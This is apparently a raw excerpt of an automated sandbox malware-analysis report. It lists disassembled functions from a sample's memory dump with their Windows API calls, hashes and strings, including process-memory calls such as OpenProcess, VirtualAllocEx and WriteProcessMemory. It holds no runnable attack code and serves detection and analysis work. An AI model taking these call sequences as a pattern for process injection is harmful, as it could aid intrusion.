                                                                                                                                                                  • Opcode Fuzzy Hash: 598b1ced612ca8cca8a505b4b4f9bab86d134c63b7f3198636fd53844870322e
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D217C70904349EFEB109F15FD8C7A97BE9FB12735F14811AF914921A0CBBC88A18F50
                                                                                                                                                                  APIs
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 00202E81
                                                                                                                                                                  • CreateThread.KERNEL32(?,?,00202FB7,00000000,?,?), ref: 00202EC5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00202ECF
                                                                                                                                                                  • _free.LIBCMT ref: 00202ED8
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00202EE3
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2664167353-0
                                                                                                                                                                  • Opcode ID: ad2e5e7b851a3402117e95ab06fc92a68cf300a0983d56a12daf083b2e298a42
                                                                                                                                                                  • Instruction ID: 78c639b413ffb423022c22de754c4693bc70aba106add6fe8da869bb932d09b4
                                                                                                                                                                  • Opcode Fuzzy Hash: ad2e5e7b851a3402117e95ab06fc92a68cf300a0983d56a12daf083b2e298a42
                                                                                                                                                                  • Instruction Fuzzy Hash: B711083252430AEFDB11AF65DC49D6B7BA8EF44770710402AF954861D3DB71E8208B60
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0021B903
                                                                                                                                                                  • GetLastError.KERNEL32(?,0021B3CB,?,?,?), ref: 0021B90D
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0021B3CB,?,?,?), ref: 0021B91C
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0021B3CB), ref: 0021B923
                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0021B93A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 883493501-0
                                                                                                                                                                  • Opcode ID: 79208a2cdb155bd3d015fcf78ce6d675e3cfe76c1c82aebe22683513afc0a72f
                                                                                                                                                                  • Instruction ID: 7b1da8e37c7c33f3a1f94d7559f7d14c0ae6cd60def2df68a8efe0f8de767f77
                                                                                                                                                                  • Opcode Fuzzy Hash: 79208a2cdb155bd3d015fcf78ce6d675e3cfe76c1c82aebe22683513afc0a72f
                                                                                                                                                                  • Instruction Fuzzy Hash: CD016D71611249BFDF114FA5EC8CDAB3BBDEF8A764B104069F545C2260DBB18C91DE60
                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00228371
                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0022837F
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00228387
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00228391
                                                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002283CD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                                  • Opcode ID: 61dac0e545cc0b2a74c0ec41868629d03a79b6b002c2164520044c098863cea1
                                                                                                                                                                  • Instruction ID: 0b1d322c52e972a168e0bb65c729361eecc7a3cc44aaed20668b35ae2e4b0eae
                                                                                                                                                                  • Opcode Fuzzy Hash: 61dac0e545cc0b2a74c0ec41868629d03a79b6b002c2164520044c098863cea1
                                                                                                                                                                  • Instruction Fuzzy Hash: B6011731D1262EEBDF00EFE4FD4DAEEBB78BB09B01F044095E941B2150DBB095648BA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • CLSIDFromProgID.COMBASE ref: 0021A874
                                                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0021A88F
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 0021A89D
                                                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 0021A8AD
                                                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 0021A8B9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                                                  • Opcode ID: b2b4210bcff43c9cc56189275cf16ea6858b45e27518c17d9cffe9ab50b54797
                                                                                                                                                                  • Instruction ID: 52b8eb4ba0c4d27d8308872393240d7cac4c359d3d96e5c684753412fc01b17e
                                                                                                                                                                  • Opcode Fuzzy Hash: b2b4210bcff43c9cc56189275cf16ea6858b45e27518c17d9cffe9ab50b54797
                                                                                                                                                                  • Instruction Fuzzy Hash: 01018F76A12209AFDB104F64EC88BDABBEDEF44351F118024F901D3210D7B0DD918BA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0021B7A5
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0021B7AF
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0021B7BE
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0021B7C5
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0021B7DB
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                                                  • Opcode ID: 3602dc0fbb829786340386813c762101019ae65b87aeb188e6d9cac903b1b253
                                                                                                                                                                  • Instruction ID: a6f21f75bab4df243b451d46b4ea8dcf2bcda479c12d1183c4096376de34b914
                                                                                                                                                                  • Opcode Fuzzy Hash: 3602dc0fbb829786340386813c762101019ae65b87aeb188e6d9cac903b1b253
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF0AF3A6402096FEB110FA5AC8CEA77BBCFF86755F208019F904CB190DBA19C528A60
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0021B806
                                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0021B810
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0021B81F
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0021B826
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0021B83C
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                                                  • Opcode ID: 67d2f192d6e72a996f1aa19e6db87aaf163ab7d95a73db4c12834b5247dc7025
                                                                                                                                                                  • Instruction ID: 4d5b219a1ff8f16bed999cef311c828589c7885d124553ab38a9af01726ac567
                                                                                                                                                                  • Opcode Fuzzy Hash: 67d2f192d6e72a996f1aa19e6db87aaf163ab7d95a73db4c12834b5247dc7025
                                                                                                                                                                  • Instruction Fuzzy Hash: 19F04F75610209AFEB221FA5FC88FA73BBCFF46B54F104069F945C7150CBA19851CA60
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0021FA8F
                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0021FAA6
                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0021FABE
                                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 0021FADA
                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0021FAF4
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                                  • Opcode ID: 81c7b2b24b9b3a5f33f24b32ca22c04fbac172f9e344d151e2898eaec86139d6
                                                                                                                                                                  • Instruction ID: af4877909a0c89ab29b6385e9653eebc6db12eb0013d0dbea4b9cd4d3f61d40b
                                                                                                                                                                  • Opcode Fuzzy Hash: 81c7b2b24b9b3a5f33f24b32ca22c04fbac172f9e344d151e2898eaec86139d6
                                                                                                                                                                  • Instruction Fuzzy Hash: BB018631910709ABEB619F10EE4EBD677B8FF10705F044169F197A54E1DBF4A9948E40
                                                                                                                                                                  APIs
                                                                                                                                                                  • EndPath.GDI32(?), ref: 001FB526
                                                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,0025F583,00000000,?), ref: 001FB542
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 001FB555
                                                                                                                                                                  • DeleteObject.GDI32 ref: 001FB568
                                                                                                                                                                  • StrokePath.GDI32(?), ref: 001FB583
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                                                  • Opcode ID: 1d0baea68fb79830cf9d82adc97647483ecb66965ad7d5f8c4aecad4a1c0f4c4
                                                                                                                                                                  • Instruction ID: 1398fe95d3cdc58bebd23c36da9233816e03deb69d63efcf338fc1163c1d650d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d0baea68fb79830cf9d82adc97647483ecb66965ad7d5f8c4aecad4a1c0f4c4
                                                                                                                                                                  • Instruction Fuzzy Hash: C6F0B230605248EFEB159F25FD4C7643BA5AB12372F188214E5A9481F0CBBD89AADF10
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0022FAB2
                                                                                                                                                                  • CoCreateInstance.COMBASE(0026DA7C,00000000,00000001,0026D8EC,?), ref: 0022FACA
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0022FD2D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                                                  • Opcode ID: aa82ed68fc2547b0d0b255fa0315f651cfbec4402ec64b3fa057bf86e897f9ea
                                                                                                                                                                  • Instruction ID: c760b82e9a5750fa93772f6db0b74724a253735fe671e963fce8d9d72d072877
                                                                                                                                                                  • Opcode Fuzzy Hash: aa82ed68fc2547b0d0b255fa0315f651cfbec4402ec64b3fa057bf86e897f9ea
                                                                                                                                                                  • Instruction Fuzzy Hash: E9A14A71504205AFD300EFA4C891EAFB7EDAF98704F40492DF155D71A2EB70EA0ACB92
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: #$+
                                                                                                                                                                  • API String ID: 0-2552117581
                                                                                                                                                                  • Opcode ID: 8a99e522b3d985dceb98014cbdb61718ebc5d0ec06aede5f556b9e3e75279459
                                                                                                                                                                  • Instruction ID: e5e3ffbb03722601eeffd20551552be4dbd282896883c52cb5edf37a38a2646e
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a99e522b3d985dceb98014cbdb61718ebc5d0ec06aede5f556b9e3e75279459
                                                                                                                                                                  • Instruction Fuzzy Hash: 8851537510425ADFCF15EF68D844AFEBBA0EF26315F244051FC819B2A0D7309DAACB28
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0027DC40,?,0000000F,0000000C,00000016,0027DC40,?), ref: 0022507B
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 001EB8A7: _memmove.LIBCMT ref: 001EB8FB
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002250FB
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                                                                  • API String ID: 2528338962-776492005
                                                                                                                                                                  • Opcode ID: 686e92c16672d029353de3e226b1bd2eb1fa1f46d03f2686d1a84a0277adc47a
                                                                                                                                                                  • Instruction ID: 376f3aea091d6eb62624f87701f89362016f4550b5ef227ed8bfd79e3eb5fbd2
                                                                                                                                                                  • Opcode Fuzzy Hash: 686e92c16672d029353de3e226b1bd2eb1fa1f46d03f2686d1a84a0277adc47a
                                                                                                                                                                  • Instruction Fuzzy Hash: 58419234A10A2AAFCF00DF94D885AAEB7B5BF48304F04C059E95AAB392D7749D61CB50
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00224D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0021C9FE,?,?,00000034,00000800,?,00000034), ref: 00224D6B
                                                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0021CFC9
                                                                                                                                                                    • Part of subcall function 00224D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0021CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00224D36
                                                                                                                                                                    • Part of subcall function 00224C65: GetWindowThreadProcessId.USER32(?,?), ref: 00224C90
                                                                                                                                                                    • Part of subcall function 00224C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0021C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00224CA0
                                                                                                                                                                    • Part of subcall function 00224C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0021C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00224CB6
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0021D036
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0021D083
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                                                  • Opcode ID: 4ce1efaa349c9d3b4ee2f88444f1e55f591b6bfe18197040e0942129f5c13474
                                                                                                                                                                  • Instruction ID: 8e750cc93f43a55edc72b8f4b6076e7740d941e5e759ff821823b1c9d3cc65d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ce1efaa349c9d3b4ee2f88444f1e55f591b6bfe18197040e0942129f5c13474
                                                                                                                                                                  • Instruction Fuzzy Hash: 12413C76900228BEDB11EFA4DC85FDEB7B8AF49700F108095EA45B7181DA706E99CB61
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0027DBF0,00000000,?,?,?,?), ref: 0024A4E6
                                                                                                                                                                  • GetWindowLongW.USER32 ref: 0024A503
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0024A513
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long
                                                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                                                  • Opcode ID: dca8b0157302e86d5b559050908ca8b9809b57c22f5186c6d43187470baf1d54
                                                                                                                                                                  • Instruction ID: c4440d8efb66bd33e8ccb86c5b0e4fc4ac35f4526cafc5b28e85ca7d173a7822
                                                                                                                                                                  • Opcode Fuzzy Hash: dca8b0157302e86d5b559050908ca8b9809b57c22f5186c6d43187470baf1d54
                                                                                                                                                                  • Instruction Fuzzy Hash: D131EE3165060AAFDB259F38CC45BEA7BA9FF49334F208314F875A21E0C770E8609B50
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 002357E7
                                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0023581D
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                                                  • String ID: ?K#$|
                                                                                                                                                                  • API String ID: 1413715105-991306622
                                                                                                                                                                  • Opcode ID: 29f4940dc88364e1ba99aee4d40623502548eb084735311628ded7019888e3ca
                                                                                                                                                                  • Instruction ID: 99b5bc55c6aab9b09ff5d01b4e8f9b917f53ba12c4f0914ae652ef4b56e23f20
                                                                                                                                                                  • Opcode Fuzzy Hash: 29f4940dc88364e1ba99aee4d40623502548eb084735311628ded7019888e3ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 21313C71C10119EBCF11AFA1CC95EEEBFB9FF28300F104019F819A6162DB319A56CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0024A74F
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0024A75D
                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0024A764
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                                                  • Opcode ID: 20e306a84507ead32b314fd572178e1eceb5723841eb85a43833c1e8459af2c0
                                                                                                                                                                  • Instruction ID: 6529287a236be75bc6c0182e54d3f2cd0ba63d6200989a7d07e23b81c685f64d
                                                                                                                                                                  • Opcode Fuzzy Hash: 20e306a84507ead32b314fd572178e1eceb5723841eb85a43833c1e8459af2c0
                                                                                                                                                                  • Instruction Fuzzy Hash: CE2192B5610209AFEB14DF68DCC5EAB77ADEF4A7A4B040059F90197251CB70EC21CAA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0024983D
                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0024984D
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00249872
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                                                  • String ID: Listbox
                                                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                                                  • Opcode ID: ae5dd244e571e799139f5d9d9ff09d89d3aeafbd0a6694a82493b6eb928f82ea
                                                                                                                                                                  • Instruction ID: a5a5a4f3ecfff8685cb2aef5b2866eec11189e410f701499bbb617e78286ca42
                                                                                                                                                                  • Opcode Fuzzy Hash: ae5dd244e571e799139f5d9d9ff09d89d3aeafbd0a6694a82493b6eb928f82ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E21F971620119BFEF158F58DC85FBB3BAEEF8A764F018124F9059B190C6719C61CBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0024A27B
                                                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0024A290
                                                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0024A29D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                                                  • Opcode ID: a6edc4a92de84118d58f07737950bcf4f85440357c107e7e3f067b899ff519b8
                                                                                                                                                                  • Instruction ID: f9b6ed6f9f2ca5ca75518a21c4feb5301e1e5c92b40eeffc576e53c98c20489a
                                                                                                                                                                  • Opcode Fuzzy Hash: a6edc4a92de84118d58f07737950bcf4f85440357c107e7e3f067b899ff519b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 55112371250208BFEF249F74CC06FA73BA8EF89B14F024118FA41A6090C2B2A821DB60
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00202F79
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000), ref: 00202F80
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                                                  • API String ID: 1029625771-340411864
                                                                                                                                                                  • Opcode ID: 0222b98ad98290c7d318bc85ea96d2fb0d7804c8d47f753210fa7ee8b9c9523c
                                                                                                                                                                  • Instruction ID: a6b541a0e761d39fb25df8a3df4a789a8e1c1d6cb35a098e56da2222c0538cd4
                                                                                                                                                                  • Opcode Fuzzy Hash: 0222b98ad98290c7d318bc85ea96d2fb0d7804c8d47f753210fa7ee8b9c9523c
                                                                                                                                                                  • Instruction Fuzzy Hash: 0BE01A74BA4306ABDF905F71FC8EB953664A706746F104065F10AD50E0CFB54464EF45
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00202F4E), ref: 0020304E
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000), ref: 00203055
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                                                  • API String ID: 1029625771-2819208100
                                                                                                                                                                  • Opcode ID: acdad705b4df7f09385c973e9e9e4967123fe07eb2454f43db9ce1b69fa67268
                                                                                                                                                                  • Instruction ID: 1501999edb3f5705c05585555f68b81a3cfe1382679762948886ec7718c07f6b
                                                                                                                                                                  • Opcode Fuzzy Hash: acdad705b4df7f09385c973e9e9e4967123fe07eb2454f43db9ce1b69fa67268
                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE0B6B4B59305ABDB209F62FD4DB553A69B706702F100054F10ED10B0CFB64960DB54
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                                                  • Opcode ID: 5b76139213a91fc107660b40fd50b07b288030d94cf5eddc5bfce21c48ba746c
                                                                                                                                                                  • Instruction ID: 5dd9ccc1f1682e3f75529bb49d0da5fcc0d28960189348678817a572a782782d
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b76139213a91fc107660b40fd50b07b288030d94cf5eddc5bfce21c48ba746c
                                                                                                                                                                  • Instruction Fuzzy Hash: FAE0EC71C3811CEBCB1597909C169BA73BCBB04302F108492BD1691041D7759B68AB15
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,002420EC,?,002422E0), ref: 00242104
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,GetProcessId), ref: 00242116
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-399901964
                                                                                                                                                                  • Opcode ID: 11e7a2744e762f7fe69d9072f860d1e052b9c3dc42ff66bc03f302e1fc0a372b
